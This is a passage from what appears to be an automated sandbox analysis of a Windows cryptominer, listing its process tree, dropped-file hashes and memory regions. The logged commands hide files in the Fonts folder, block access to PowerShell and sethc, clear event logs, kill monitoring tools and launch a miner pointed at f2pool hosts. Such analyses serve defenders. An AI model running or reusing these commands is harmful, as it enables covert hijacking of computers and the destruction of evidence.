        [3] C:\Windows\SysWOW64\attrib.exe
            attrib +s +h +r C:\Windows\Fonts\csrss.exe
            - Sets file to hidden
            - Drops file in Windows directory
            - Views/modifies file attributes

        [3] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"

        [3] C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\Fonts\csrss.exe /d everyone

        [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exe (depth 1)
c:\windows\Fonts\svchost.exe
- Executes dropped EXE
- Loads dropped DLL
-
\??\c:\windows\Fonts\rundlls.exe (depth 2)
"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize 215B
MD5 535a478cc80a0fbbf990eed73f8788bb
SHA1 459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256 323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA512 3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exe
Filesize 2.9MB
MD5 1b9583c6c3eab1da961aec9e42bfbcb8
SHA1 c60f85fa6bcc463b3d38b7714916b241f2139650
SHA256 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA512 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exe
Filesize 5.2MB
MD5 ed499b3a95e11ecf57e5131cd82c2a14
SHA1 7f37e85068457497f5f34e73edde4963694cfc19
SHA256 c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512 f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exe
Filesize 87KB
MD5 c945fa7d5ecb219c248ea09ea3bbe8e4
SHA1 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA256 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA512 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.batFilesize
6KB
MD59da29265b1391c18f00c959c64b3fb65
SHA1dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA5126d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/268-81-0x0000000000000000-mapping.dmp
-
memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/272-77-0x0000000000000000-mapping.dmp
-
memory/328-80-0x0000000000000000-mapping.dmp
-
memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/384-73-0x0000000000000000-mapping.dmp
-
memory/384-117-0x0000000000000000-mapping.dmp
-
memory/392-92-0x0000000000000000-mapping.dmp
-
memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/520-123-0x0000000000000000-mapping.dmp
-
memory/560-63-0x0000000000000000-mapping.dmp
-
memory/580-114-0x0000000000000000-mapping.dmp
-
memory/580-64-0x0000000000000000-mapping.dmp
-
memory/604-75-0x0000000000000000-mapping.dmp
-
memory/624-57-0x0000000000000000-mapping.dmp
-
memory/632-102-0x0000000000000000-mapping.dmp
-
memory/632-67-0x0000000000000000-mapping.dmp
-
memory/688-76-0x0000000000000000-mapping.dmp
-
memory/696-91-0x0000000000000000-mapping.dmp
-
memory/772-90-0x0000000000000000-mapping.dmp
-
memory/832-70-0x0000000000000000-mapping.dmp
-
memory/840-121-0x0000000000000000-mapping.dmp
-
memory/896-56-0x0000000000000000-mapping.dmp
-
memory/904-78-0x0000000000000000-mapping.dmp
-
memory/940-122-0x0000000000000000-mapping.dmp
-
memory/972-72-0x0000000000000000-mapping.dmp
-
memory/996-119-0x0000000000000000-mapping.dmp
-
memory/1108-111-0x0000000000000000-mapping.dmp
-
memory/1168-68-0x0000000000000000-mapping.dmp
-
memory/1216-59-0x0000000000000000-mapping.dmp
-
memory/1216-88-0x0000000000000000-mapping.dmp
-
memory/1280-112-0x0000000000000000-mapping.dmp
-
memory/1352-125-0x0000000000000000-mapping.dmp
-
memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1392-85-0x0000000000000000-mapping.dmp
-
memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1412-127-0x0000000000000000-mapping.dmp
-
memory/1412-74-0x0000000000000000-mapping.dmp
-
memory/1436-69-0x0000000000000000-mapping.dmp
-
memory/1460-65-0x0000000000000000-mapping.dmp
-
memory/1488-118-0x0000000000000000-mapping.dmp
-
memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/1516-95-0x0000000000250000-0x00000000002A3000-memory.dmpFilesize
332KB
-
memory/1516-54-0x00000000755A1000-0x00000000755A3000-memory.dmpFilesize
8KB
-
memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/1544-71-0x0000000000000000-mapping.dmp
-
memory/1556-124-0x0000000000000000-mapping.dmp
-
memory/1600-115-0x0000000000000000-mapping.dmp
-
memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1652-66-0x0000000000000000-mapping.dmp
-
memory/1720-116-0x0000000000000000-mapping.dmp
-
memory/1784-55-0x0000000000000000-mapping.dmp
-
memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/1796-108-0x0000000000000000-mapping.dmp
-
memory/1804-58-0x0000000000000000-mapping.dmp
-
memory/1960-126-0x0000000000000000-mapping.dmp
-
memory/1960-62-0x0000000000000000-mapping.dmp
-
memory/1984-113-0x0000000000000000-mapping.dmp
-
memory/1984-89-0x0000000000000000-mapping.dmp
-
memory/2020-103-0x0000000000000000-mapping.dmp
-
memory/2028-120-0x0000000000000000-mapping.dmp
-
memory/2028-61-0x0000000000000000-mapping.dmp
-
memory/2032-60-0x0000000000000000-mapping.dmp
-
memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2044-82-0x0000000000000000-mapping.dmp
-
memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2120-133-0x0000000000000000-mapping.dmp
-
memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2132-134-0x0000000000000000-mapping.dmp
-
memory/2152-135-0x0000000000000000-mapping.dmp
-
memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2180-137-0x0000000000000000-mapping.dmp
-
memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2204-139-0x0000000000000000-mapping.dmp
-
memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2232-143-0x0000000000000000-mapping.dmp
-
memory/2276-145-0x0000000000000000-mapping.dmp
-
memory/2336-149-0x0000000000000000-mapping.dmp
-
memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2432-157-0x0000000000000000-mapping.dmp
-
memory/2432-160-0x0000000000080000-0x00000000000A0000-memory.dmpFilesize
128KB
-
memory/2460-161-0x0000000000000000-mapping.dmp
-
memory/2496-162-0x0000000000000000-mapping.dmp